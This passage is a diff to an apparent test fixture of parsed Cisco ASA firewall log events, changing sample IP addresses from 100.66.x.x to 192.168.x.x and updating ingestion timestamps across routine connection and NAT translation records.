"mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11829", "source_interface": "outside", "mapped_destination_port": 1295 @@ -14176,8 +14176,8 @@ }, "destination": { "port": 8300, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1296, @@ -14217,7 +14217,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -14225,8 +14225,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722029300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1296 to outside:100.66.98.44/8300", + "ingested": "2021-12-09T13:34:28.100238300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1296 to outside:192.168.98.44/8300", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -14259,8 +14259,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -14295,7 +14295,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -14304,8 +14304,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722033900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11830 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1296 (172.31.98.44/1296)", + "ingested": "2021-12-09T13:34:28.100243800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11830 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1296 (172.31.98.44/1296)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -14321,7 +14321,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11830", "source_interface": "outside", "mapped_destination_port": 1296 @@ -14343,8 +14343,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -14379,7 +14379,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -14390,8 +14390,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-09-07T12:21:32.722038400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11828 for outside:100.66.98.165/80 to inside:172.31.98.44/1294 duration 0:00:00 bytes 6694 TCP FINs", + "ingested": "2021-12-09T13:34:28.100249400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11828 for outside:192.168.98.165/80 to inside:172.31.98.44/1294 duration 0:00:00 bytes 6694 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -14428,8 +14428,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -14464,7 +14464,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -14475,8 +14475,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-09-07T12:21:32.722042700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11829 for outside:100.66.98.165/80 to inside:172.31.98.44/1295 duration 0:00:00 bytes 1493 TCP FINs", + "ingested": "2021-12-09T13:34:28.100255Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11829 for outside:192.168.98.165/80 to inside:172.31.98.44/1295 duration 0:00:00 bytes 1493 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -14513,8 +14513,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -14549,7 +14549,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -14560,8 +14560,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-09-07T12:21:32.722047Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11830 for outside:100.66.98.165/80 to inside:172.31.98.44/1296 duration 0:00:00 bytes 893 TCP FINs", + "ingested": "2021-12-09T13:34:28.100260600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11830 for outside:192.168.98.165/80 to inside:172.31.98.44/1296 duration 0:00:00 bytes 893 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -14593,8 +14593,8 @@ }, "destination": { "port": 8301, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1297, @@ -14634,7 +14634,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -14642,8 +14642,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722051200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1297 to outside:100.66.98.44/8301", + "ingested": "2021-12-09T13:34:28.100266200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1297 to outside:192.168.98.44/8301", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -14676,8 +14676,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -14712,7 +14712,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -14721,8 +14721,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722055500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11831 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1297 (172.31.98.44/1297)", + "ingested": "2021-12-09T13:34:28.100271800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11831 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1297 (172.31.98.44/1297)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -14738,7 +14738,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11831", "source_interface": "outside", "mapped_destination_port": 1297 @@ -14755,8 +14755,8 @@ }, "destination": { "port": 8302, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1298, @@ -14796,7 +14796,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -14804,8 +14804,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722060Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1298 to outside:100.66.98.44/8302", + "ingested": "2021-12-09T13:34:28.100277300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1298 to outside:192.168.98.44/8302", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -14838,8 +14838,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -14874,7 +14874,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -14883,8 +14883,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722064400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11832 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1298 (172.31.98.44/1298)", + "ingested": "2021-12-09T13:34:28.100282800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11832 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1298 (172.31.98.44/1298)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -14900,7 +14900,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11832", "source_interface": "outside", "mapped_destination_port": 1298 @@ -14922,8 +14922,8 @@ }, "source": { "port": 53, - "address": "100.66.179.9", - "ip": "100.66.179.9" + "address": "192.168.179.9", + "ip": "192.168.179.9" }, "tags": [ "preserve_original_event" @@ -14958,7 +14958,7 @@ "localhost" ], "ip": [ - "100.66.179.9", + "192.168.179.9", "172.31.98.44" ] }, @@ -14967,8 +14967,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722068900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11833 for outside:100.66.179.9/53 (100.66.179.9/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:34:28.100288400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11833 for outside:192.168.179.9/53 (192.168.179.9/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -14984,7 +14984,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.179.9", + "mapped_source_ip": "192.168.179.9", "connection_id": "11833", "source_interface": "outside", "mapped_destination_port": 56132 @@ -15006,8 +15006,8 @@ }, "source": { "port": 53, - "address": "100.66.179.9", - "ip": "100.66.179.9" + "address": "192.168.179.9", + "ip": "192.168.179.9" }, "tags": [ "preserve_original_event" @@ -15042,7 +15042,7 @@ "localhost" ], "ip": [ - "100.66.179.9", + "192.168.179.9", "172.31.98.44" ] }, @@ -15052,8 +15052,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-09-07T12:21:32.722073200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11833 for outside:100.66.179.9/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150", + "ingested": "2021-12-09T13:34:28.100294Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11833 for outside:192.168.179.9/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -15090,8 +15090,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -15126,7 +15126,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -15137,8 +15137,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-09-07T12:21:32.722077500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11831 for outside:100.66.98.165/80 to inside:172.31.98.44/1297 duration 0:00:00 bytes 2750 TCP FINs", + "ingested": "2021-12-09T13:34:28.100298900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11831 for outside:192.168.98.165/80 to inside:172.31.98.44/1297 duration 0:00:00 bytes 2750 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -15170,8 +15170,8 @@ }, "destination": { "port": 8303, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1299, @@ -15211,7 +15211,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -15219,8 +15219,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722081700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1299 to outside:100.66.98.44/8303", + "ingested": "2021-12-09T13:34:28.100302400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1299 to outside:192.168.98.44/8303", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -15253,8 +15253,8 @@ }, "source": { "port": 80, - "address": "100.66.247.99", - "ip": "100.66.247.99" + "address": "192.168.247.99", + "ip": "192.168.247.99" }, "tags": [ "preserve_original_event" @@ -15289,7 +15289,7 @@ "localhost" ], "ip": [ - "100.66.247.99", + "192.168.247.99", "172.31.98.44" ] }, @@ -15298,8 +15298,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722086100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11834 for outside:100.66.247.99/80 (100.66.247.99/80) to inside:172.31.98.44/1299 (172.31.98.44/1299)", + "ingested": "2021-12-09T13:34:28.100306900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11834 for outside:192.168.247.99/80 (192.168.247.99/80) to inside:172.31.98.44/1299 (172.31.98.44/1299)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -15315,7 +15315,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.247.99", + "mapped_source_ip": "192.168.247.99", "connection_id": "11834", "source_interface": "outside", "mapped_destination_port": 1299 @@ -15332,8 +15332,8 @@ }, "destination": { "port": 8304, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1300, @@ -15373,7 +15373,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -15381,8 +15381,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722090500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1300 to outside:100.66.98.44/8304", + "ingested": "2021-12-09T13:34:28.100312100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1300 to outside:192.168.98.44/8304", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -15415,8 +15415,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -15451,7 +15451,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -15460,8 +15460,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722095300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11835 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1300 (172.31.98.44/1300)", + "ingested": "2021-12-09T13:34:28.100317Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11835 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1300 (172.31.98.44/1300)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -15477,7 +15477,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11835", "source_interface": "outside", "mapped_destination_port": 1300 @@ -15499,8 +15499,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -15535,7 +15535,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -15546,8 +15546,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-09-07T12:21:32.722099500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11832 for outside:100.66.98.165/80 to inside:172.31.98.44/1298 duration 0:00:00 bytes 881 TCP FINs", + "ingested": "2021-12-09T13:34:28.100322700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11832 for outside:192.168.98.165/80 to inside:172.31.98.44/1298 duration 0:00:00 bytes 881 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -15584,8 +15584,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -15620,7 +15620,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -15631,8 +15631,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-09-07T12:21:32.722103700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11835 for outside:100.66.98.165/80 to inside:172.31.98.44/1300 duration 0:00:00 bytes 2202 TCP FINs", + "ingested": "2021-12-09T13:34:28.100326900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11835 for outside:192.168.98.165/80 to inside:172.31.98.44/1300 duration 0:00:00 bytes 2202 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -15664,8 +15664,8 @@ }, "destination": { "port": 8305, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1301, @@ -15705,7 +15705,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -15713,8 +15713,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722107900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1301 to outside:100.66.98.44/8305", + "ingested": "2021-12-09T13:34:28.100331100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1301 to outside:192.168.98.44/8305", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -15747,8 +15747,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -15783,7 +15783,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -15792,8 +15792,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722112300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11836 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1301 (172.31.98.44/1301)", + "ingested": "2021-12-09T13:34:28.100334600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11836 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1301 (172.31.98.44/1301)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -15809,7 +15809,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11836", "source_interface": "outside", "mapped_destination_port": 1301 @@ -15826,8 +15826,8 @@ }, "destination": { "port": 8306, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1302, @@ -15867,7 +15867,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -15875,8 +15875,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722117600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1302 to outside:100.66.98.44/8306", + "ingested": "2021-12-09T13:34:28.100338900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1302 to outside:192.168.98.44/8306", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -15909,8 +15909,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -15945,7 +15945,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -15954,8 +15954,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722121900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11837 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1302 (172.31.98.44/1302)", + "ingested": "2021-12-09T13:34:28.100344500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11837 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1302 (172.31.98.44/1302)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -15971,7 +15971,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11837", "source_interface": "outside", "mapped_destination_port": 1302 @@ -16009,8 +16009,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722126Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1276 to outside:100.66.98.44/8280 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.100350100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1276 to outside:192.168.98.44/8280 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16056,8 +16056,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722130Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1277 to outside:100.66.98.44/8281 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.100372600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1277 to outside:192.168.98.44/8281 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16103,8 +16103,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722134300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1278 to outside:100.66.98.44/8282 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.100378600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1278 to outside:192.168.98.44/8282 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16150,8 +16150,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722139Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1279 to outside:100.66.98.44/8283 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.100384500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1279 to outside:192.168.98.44/8283 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16197,8 +16197,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722143300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1280 to outside:100.66.98.44/8284 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.100393200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1280 to outside:192.168.98.44/8284 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16244,8 +16244,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722147600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1281 to outside:100.66.98.44/8285 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.100399200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1281 to outside:192.168.98.44/8285 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16291,8 +16291,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722162600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1282 to outside:100.66.98.44/8286 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.100405200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1282 to outside:192.168.98.44/8286 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16338,8 +16338,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722171100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1283 to outside:100.66.98.44/8287 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.100411100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1283 to outside:192.168.98.44/8287 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16385,8 +16385,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722176500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1284 to outside:100.66.98.44/8288 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.100417Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1284 to outside:192.168.98.44/8288 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16432,8 +16432,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722181600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1285 to outside:100.66.98.44/8289 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.100422900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1285 to outside:192.168.98.44/8289 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16479,8 +16479,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722186100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1286 to outside:100.66.98.44/8290 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.100428800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1286 to outside:192.168.98.44/8290 duration 0:00:30", "code": "305012", "kind": "event", 